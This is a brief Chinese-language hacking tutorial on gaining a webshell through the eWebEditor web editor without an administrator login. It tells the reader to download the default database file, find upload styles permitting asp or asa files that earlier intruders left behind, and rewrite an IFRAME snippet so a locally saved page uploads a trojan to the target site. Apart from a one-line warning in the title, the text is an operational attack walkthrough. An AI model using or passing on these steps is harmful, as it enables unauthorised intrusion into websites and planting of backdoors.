不登陆后台也可以拿到shell，ewebeditor漏洞要小心

在数据库没被删掉的情况下。（默认：/db/ewebeditor.mdb）如果没删掉的话，把数据库给Down下来。

然后打开，查看Style这里，看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件，如果有往下看。

查找到这段：

<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>

把那个s_light换成你刚才看到的样式名字，然后把链接补全。

<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>

然后另存为在本地，在本地打开，提交。

如果不出意外，就应该能看到你提交的马了。